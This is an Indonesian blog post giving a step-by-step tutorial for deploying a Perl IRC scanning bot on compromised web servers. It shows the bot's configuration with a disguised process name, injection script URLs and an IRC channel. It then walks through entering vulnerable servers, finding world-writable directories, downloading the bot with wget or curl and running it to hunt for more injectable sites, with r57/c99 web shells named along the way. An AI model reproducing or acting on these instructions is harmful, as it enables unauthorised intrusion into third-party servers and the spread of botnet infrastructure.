BOT ini ditulis dengan bahasa Perl
* Jangan tanya saya tentang Perl ya Cz lum mahir :) xixixixi, Tapi kalaw Tetap mau tawu Caranya.. Tanya aja Tuh ma ohmZ google :P
Singkatnya aja yaaa... Perl adalah salah satu bahasa script... Nah yang kita gunakan sekarang adalah Bot Scan berbasis perl atau dikenal dengan .pl... nahh bot scan ini berfungsi mencari target shell/inject dengan cara automatic scan menggunakan search engine. Hal ini memudahkan kita untuk mencari webserver yang vulnerable...
Script BOT Scan dan File pendukungnya dapat diambil disini...
Nah... Sekarang kita mulai editing BOT Scan-nya agar join ke channel kita
Perhatikan bagian ini... Silahkan edit sesuai keperluan...
Tapi jangan sampe salah masukkan konfigurasinya... Bisa ngga jalan BOT-nya...
###############CONFIGURATION#########
my $processo = "/usr/local/apache/bin/httpd -DSSL"; >>> Ini Fake Process yang berjalan di background
my $printcmd="http://destra.ca/s"; >>> Ini script yang dipakai buat injection
my $server="swiftco.wa.us.dal.net"; >>> Ini server IRC tempat mangkal-nya BOT
my $porta="6667"; >>> Ini port yang digunakan oleh server IRC
my $nick="Cleaning_Service"; >>> Ini nick yang digunakan untuk BOT
my $chan="#hackers-center"; >>> Ini channel tempat mangkalnya BOT
###############END OF CONFIGURATION####
Oke... Konfigurasi selesai...
Selanjutnya liat bagian ini...
my $cmd="http://www.alkautsar-bdl.sch.id/safe.txt";
File safe.txt merupakan source pendukung untuk BOT Mic22... Jangan sampe link tersebut tidak bisa diakses...
Solusinya... Upload link tersebut bersama-sama dengan source BOT yang akan kita jalankan... Dan ganti link tersebut sesuai dengan url yang menuju file safe.txt...
Jangan menggunakan file safe.txt dari source lainnya... Karena bisa saja berbeda versinya...
Nah... Sekarang untuk menjalankan BOT Scan pada injekan...
Karena kita belum memiliki BOT Scan sendiri... Injekan bisa liat di channel yang sudah ada BOT Scan atau minta kepada yang sering melakukan scanning...
* Jangan minta sama saya yaaaa...
1. Upload script di hosting sendiri atau di hosting gratisan... Yang penting bisa diakses... Selalu bawa script tersebut di FD...
2. Masuk ke server yang vulnerable... Cari direktory yang writable (Bisa ditulis) atau file permision-nya 777... Liat di command untuk r57... Atau pake perintah “find / -perm 777 -type d”
3. Download file script BOT Scan... Perintahnya...???
wget http:://www.link-file-hostingan-loe.com;ls -al atau
lwp-download http:://www.link-file-hostingan-loe.com;ls -al atau
curl -o http:://www.link-file-hostingan-loe.com scan.txt
4. Kalo ngga bisa juga... Upload aza langsung dari r57 atau c99...
5. Gunakan perintah "mv [file awal] [file baru]" untuk mengubah nama file
6. Eksekusi file scanner menggunakan perintah "perl [nama file]
7. Tunggu BOT-nya di channel... Good Luck
8. Untuk melihat proses di background menggunakan perintah "ps x"
9. Untuk mematikan proses di background menggunakan perintah "kill -9 [PID Number]
Tambahan:
Tutorial ini hanya berjalan pada mesin LINUX atau keluarga OS UNIX
Semua command diatas digunakan tanpa tanda "
Kalau BOT-nya ngga join di channel... Ada beberapa hal yang bisa jadi problem...
1. Server tidak mendukung Perl
2. Server tidak kuat menjalankan program BOT Scan
3. BOT Scan di blok oleh firewall
4. IP server di AKILL oleh server IRC dimana kita joinkan BOT
5. Konfigurasi script ada yang salah
Untuk source BOT Scan diatas... Daftar perintah yang digunaka adalah...
!help >>> Untuk melihat daftar perintah
!clean [bug] [dork] >>> Untuk melakukan scanning
!mwultimi >>> Untuk melihat list bug terbaru di www.milw0rm.com
!engine >>> Untuk melihat search engine yang support pada BOT
!info >>> Untuk melihat info BOT
!kill >>> Untuk mematikan BOT... Ini perintah rahasia... Sebaiknya diganti sesuai dengan selera ADMIN BOT
Rasanya sudah panjang lebar uraian saya... Kurang lebihnya mohon maaf... Untuk para master yang sudah paham... Jangan diejek yaaaaa :) Silahkan tambahkan saja apa yang kurang...
Tidak ada komentar:
Posting Komentar